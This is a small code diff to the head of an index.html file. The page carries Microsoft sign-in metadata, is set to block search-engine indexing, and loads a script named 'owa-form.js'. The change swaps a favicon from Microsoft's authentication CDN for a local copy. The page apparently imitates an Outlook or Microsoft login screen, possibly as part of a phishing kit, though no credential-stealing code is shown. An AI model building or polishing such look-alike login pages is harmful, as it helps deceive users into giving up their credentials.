--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
     <meta name="LocLC" content="en-GB-OXENDICT">
     <meta name="format-detection" content="telephone=no">
     <meta name="robots" content="none">
-    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" />
+    <link rel="shortcut icon" href="favicon.ico" />
     <link data-loader="cdn" crossorigin="anonymous" href="style.css" rel="stylesheet">
     <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
   <script type="module" crossorigin src="owa-form.js"></script>
